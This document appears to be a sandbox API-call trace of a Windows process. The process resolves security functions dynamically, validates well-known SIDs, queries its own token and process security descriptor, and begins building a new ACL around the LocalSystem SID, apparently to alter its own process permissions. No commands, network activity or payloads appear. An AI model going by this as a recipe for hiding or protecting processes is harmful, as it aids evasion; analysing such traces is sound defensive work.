[0120.334] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6702c, pSourceSid=0x2b2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.334] IsValidSid (pSid=0x2a6702c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.334] ConvertSidToStringSidA () returned 0x1
[0120.334] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.334] LocalFree (hMem=0x2b2f90) returned 0x0
[0120.334] ConvertStringSidToSidA () returned 0x1
[0120.334] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f5a0, pSourceSid=0x2b2f90*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.334] IsValidSid (pSid=0x2a6f5a0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.334] ConvertSidToStringSidA () returned 0x1
[0120.334] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.334] LocalFree (hMem=0x2b2f90) returned 0x0
[0120.334] ConvertStringSidToSidA () returned 0x1
[0120.334] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f614, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.334] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.334] ConvertSidToStringSidA () returned 0x1
[0120.334] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.334] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.335] ConvertStringSidToSidA () returned 0x1
[0120.335] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f688, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe) | out: pDestinationSid=0x2a6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0120.335] IsValidSid (pSid=0x2a6f688*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xe)) returned 1
[0120.335] ConvertSidToStringSidA () returned 0x1
[0120.335] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.335] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.335] ConvertStringSidToSidA () returned 0x1
[0120.335] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f6fc, pSourceSid=0x2c6f58*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0) | out: pDestinationSid=0x2a6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0120.335] IsValidSid (pSid=0x2a6f6fc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0), SubAuthority=0x0)) returned 1
[0120.335] ConvertSidToStringSidA () returned 0x1
[0120.335] LocalFree (hMem=0x2bc1c8) returned 0x0
[0120.335] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.335] ConvertStringSidToSidA () returned 0x1
[0120.335] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f770, pSourceSid=0x2c6f70*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0) | out: pDestinationSid=0x2a6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0120.335] IsValidSid (pSid=0x2a6f770*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0)) returned 1
[0120.335] ConvertSidToStringSidA () returned 0x1
[0120.335] LocalFree (hMem=0x2bc1c8) returned 0x0
[0120.335] LocalFree (hMem=0x2c6f70) returned 0x0
[0120.335] ConvertStringSidToSidA () returned 0x1
[0120.335] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f7f8, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0) | out: pDestinationSid=0x2a6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0120.335] IsValidSid (pSid=0x2a6f7f8*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x2), SubAuthority=0x0)) returned 1
[0120.335] ConvertSidToStringSidA () returned 0x1
[0120.335] LocalFree (hMem=0x2bc1c8) returned 0x0
[0120.335] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.335] ConvertStringSidToSidA () returned 0x1
[0120.335] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f880, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14) | out: pDestinationSid=0x2a6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0120.335] IsValidSid (pSid=0x2a6f880*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14)) returned 1
[0120.335] ConvertSidToStringSidA () returned 0x1
[0120.335] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.335] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.335] ConvertStringSidToSidA () returned 0x1
[0120.335] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f90c, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13) | out: pDestinationSid=0x2a6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0120.335] IsValidSid (pSid=0x2a6f90c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13)) returned 1
[0120.335] ConvertSidToStringSidA () returned 0x1
[0120.335] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.335] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.336] ConvertStringSidToSidA () returned 0x1
[0120.336] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6f998, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa) | out: pDestinationSid=0x2a6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0120.336] IsValidSid (pSid=0x2a6f998*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xa)) returned 1
[0120.336] ConvertSidToStringSidA () returned 0x1
[0120.336] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.336] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.336] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.336] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentThread") returned 0x753c3351
[0120.336] GetCurrentThread () returned 0xfffffffe
[0120.336] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.336] GetProcAddress (hModule=0x76da0000, lpProcName="OpenThreadToken") returned 0x76db432c
[0120.336] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0xf01ff, OpenAsSelf=1, TokenHandle=0x1ae784 | out: TokenHandle=0x1ae784*=0x2943756) returned 0
[0120.336] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.336] GetProcAddress (hModule=0x75370000, lpProcName="GetCurrentProcess") returned 0x753bcdcf
[0120.336] GetCurrentProcess () returned 0xffffffff
[0120.336] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.336] GetProcAddress (hModule=0x76da0000, lpProcName="OpenProcessToken") returned 0x76db4304
[0120.337] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0xf01ff, TokenHandle=0x2a6fa3c | out: TokenHandle=0x2a6fa3c*=0x1d0) returned 1
[0120.337] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.337] GetProcAddress (hModule=0x76da0000, lpProcName="MapGenericMask") returned 0x76dc7a73
[0120.337] MapGenericMask (in: AccessMask=0x1ae5fc, GenericMapping=0x1ae600 | out: AccessMask=0x1ae5fc)
[0120.337] MapGenericMask (in: AccessMask=0x1ae730, GenericMapping=0x1ae734 | out: AccessMask=0x1ae730)
[0120.337] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.337] GetProcAddress (hModule=0x76da0000, lpProcName="GetTokenInformation") returned 0x76db431c
[0120.337] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1ae744 | out: TokenInformation=0x0, ReturnLength=0x1ae744) returned 0
[0120.337] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.337] GetProcAddress (hModule=0x75370000, lpProcName="GetLastError") returned 0x753bbf00
[0120.337] GetLastError () returned 0x7a
[0120.337] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.338] GetProcAddress (hModule=0x75370000, lpProcName="HeapAlloc") returned 0x76f72dd6
[0120.338] GetTokenInformation (in: TokenHandle=0x1d0, TokenInformationClass=0x1, TokenInformation=0x2c0780, TokenInformationLength=0x24, ReturnLength=0x1ae768 | out: TokenInformation=0x2c0780, ReturnLength=0x1ae768) returned 1
[0120.338] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fab0, pSourceSid=0x2c0788*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.338] IsValidSid (pSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.338] ConvertSidToStringSidA () returned 0x1
[0120.338] LocalFree (hMem=0x2b9e80) returned 0x0
[0120.338] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.338] GetProcAddress (hModule=0x75370000, lpProcName="HeapFree") returned 0x753bbbd0
[0120.338] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fb34, pSourceSid=0x2a6fab0*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)) | out: pDestinationSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.338] IsValidSid (pSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.338] ConvertSidToStringSidA () returned 0x1
[0120.338] LocalFree (hMem=0x2b9e80) returned 0x0
[0120.338] IsValidSid (pSid=0x2a6fb34*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65))) returned 1
[0120.338] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.338] GetProcAddress (hModule=0x75370000, lpProcName="CloseHandle") returned 0x753bca7c
[0120.338] CloseHandle (hObject=0x1d0) returned 1
[0120.338] ConvertStringSidToSidA () returned 0x1
[0120.338] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fa54, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000) | out: pDestinationSid=0x2a6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0120.338] IsValidSid (pSid=0x2a6fa54*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x1000)) returned 1
[0120.338] ConvertSidToStringSidA () returned 0x1
[0120.338] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.338] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.338] ConvertStringSidToSidA () returned 0x1
[0120.338] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fae0, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000) | out: pDestinationSid=0x2a6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0120.339] IsValidSid (pSid=0x2a6fae0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x2000)) returned 1
[0120.339] ConvertSidToStringSidA () returned 0x1
[0120.339] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.339] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.339] ConvertStringSidToSidA () returned 0x1
[0120.339] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fbfc, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000) | out: pDestinationSid=0x2a6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0120.339] IsValidSid (pSid=0x2a6fbfc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000)) returned 1
[0120.339] ConvertSidToStringSidA () returned 0x1
[0120.339] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.339] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.339] ConvertStringSidToSidA () returned 0x1
[0120.339] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fc8c, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000) | out: pDestinationSid=0x2a6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0120.339] IsValidSid (pSid=0x2a6fc8c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x4000)) returned 1
[0120.339] ConvertSidToStringSidA () returned 0x1
[0120.339] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.339] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.339] ConvertStringSidToSidA () returned 0x1
[0120.339] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fd1c, pSourceSid=0x2c6f40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000) | out: pDestinationSid=0x2a6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0120.339] IsValidSid (pSid=0x2a6fd1c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x5000)) returned 1
[0120.339] ConvertSidToStringSidA () returned 0x1
[0120.339] LocalFree (hMem=0x2c6f58) returned 0x0
[0120.339] LocalFree (hMem=0x2c6f40) returned 0x0
[0120.339] GetCurrentProcessId () returned 0xfc8
[0120.339] OpenProcess (dwDesiredAccess=0x60000, bInheritHandle=0, dwProcessId=0xfc8) returned 0x1d0
[0120.339] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.339] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityInfo") returned 0x76dab3e4
[0120.339] GetSecurityInfo () returned 0x0
[0120.344] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.344] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorControl") returned 0x76daaddf
[0120.344] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x2c0f28, pControl=0x1ae50a, lpdwRevision=0x1ae504 | out: pControl=0x1ae50a, lpdwRevision=0x1ae504) returned 1
[0120.344] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.344] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorOwner") returned 0x76daadf7
[0120.344] GetSecurityDescriptorOwner (in: pSecurityDescriptor=0x2c0f28, pOwner=0x1ae500, lpbOwnerDefaulted=0x1ae4f4 | out: pOwner=0x1ae500*=0x0, lpbOwnerDefaulted=0x1ae4f4) returned 1
[0120.344] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.345] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorGroup") returned 0x76daae27
[0120.345] GetSecurityDescriptorGroup (in: pSecurityDescriptor=0x2c0f28, pGroup=0x1ae500, lpbGroupDefaulted=0x1ae4f4 | out: pGroup=0x1ae500*=0x0, lpbGroupDefaulted=0x1ae4f4) returned 1
[0120.345] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.345] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorDacl") returned 0x76db41a6
[0120.345] GetSecurityDescriptorDacl (in: pSecurityDescriptor=0x2c0f28, lpbDaclPresent=0x1ae4f8, pDacl=0x1ae4ec, lpbDaclDefaulted=0x1ae4f4 | out: lpbDaclPresent=0x1ae4f8, pDacl=0x1ae4ec, lpbDaclDefaulted=0x1ae4f4) returned 1
[0120.345] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.345] GetProcAddress (hModule=0x76da0000, lpProcName="IsValidAcl") returned 0x76da8523
[0120.345] IsValidAcl (pAcl=0x2c0f3c) returned 1
[0120.345] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.345] GetProcAddress (hModule=0x76da0000, lpProcName="GetAce") returned 0x76db45f0
[0120.345] GetAce (in: pAcl=0x2c0f3c, dwAceIndex=0x0, pAce=0x1ae38c | out: pAce=0x1ae38c*=0x2c0f44) returned 1
[0120.345] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6fe74, pSourceSid=0x2c0f4c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)) | out: pDestinationSid=0x2a6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.345] IsValidSid (pSid=0x2a6fe74*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1
[0120.345] ConvertSidToStringSidA () returned 0x1
[0120.345] LocalFree (hMem=0x2c7018) returned 0x0
[0120.345] GetAce (in: pAcl=0x2c0f3c, dwAceIndex=0x1, pAce=0x1ae38c | out: pAce=0x1ae38c*=0x2c0f5c) returned 1
[0120.345] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a6ff60, pSourceSid=0x2c0f64*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12) | out: pDestinationSid=0x2a6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.346] IsValidSid (pSid=0x2a6ff60*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.346] ConvertSidToStringSidA () returned 0x1
[0120.346] LocalFree (hMem=0x2c7018) returned 0x0
[0120.346] GetAce (in: pAcl=0x2c0f3c, dwAceIndex=0x2, pAce=0x1ae38c | out: pAce=0x1ae38c*=0x2c0f70) returned 1
[0120.346] CopySid (in: nDestinationSidLength=0x44, pDestinationSid=0x2a629c0, pSourceSid=0x2c0f78*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0)) | out: pDestinationSid=0x2a629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0120.346] IsValidSid (pSid=0x2a629c0*(Revision=0x1, SubAuthorityCount=0x3, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x5, [1]=0x0, [2]=0x0))) returned 1
[0120.346] ConvertSidToStringSidA () returned 0x1
[0120.346] LocalFree (hMem=0x2c7018) returned 0x0
[0120.346] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.346] GetProcAddress (hModule=0x76da0000, lpProcName="GetSecurityDescriptorSacl") returned 0x76db4608
[0120.346] GetSecurityDescriptorSacl (in: pSecurityDescriptor=0x2c0f28, lpbSaclPresent=0x1ae4fc, pSacl=0x1ae4f0, lpbSaclDefaulted=0x1ae4f4 | out: lpbSaclPresent=0x1ae4fc, pSacl=0x1ae4f0, lpbSaclDefaulted=0x1ae4f4) returned 1
[0120.346] LocalFree (hMem=0x2c0f28) returned 0x0
[0120.346] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.346] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.346] GetProcAddress (hModule=0x76da0000, lpProcName="GetLengthSid") returned 0x76db413b
[0120.346] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0120.346] GetLastError () returned 0x0
[0120.346] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75370000
[0120.346] GetProcAddress (hModule=0x75370000, lpProcName="GlobalAlloc") returned 0x753b9ce1
[0120.347] GetModuleHandleA (lpModuleName="advapi32.dll") returned 0x76da0000
[0120.347] GetProcAddress (hModule=0x76da0000, lpProcName="InitializeAcl") returned 0x76db45cd
[0120.347] InitializeAcl (in: pAcl=0x2c7fa8, nAclLength=0x1c, dwAclRevision=0x2 | out: pAcl=0x2c7fa8) returned 1
[0120.347] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
[0120.347] GetLengthSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 0xc
[0120.347] GetLastError () returned 0x0
[0120.347] IsValidSid (pSid=0x2a6f614*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
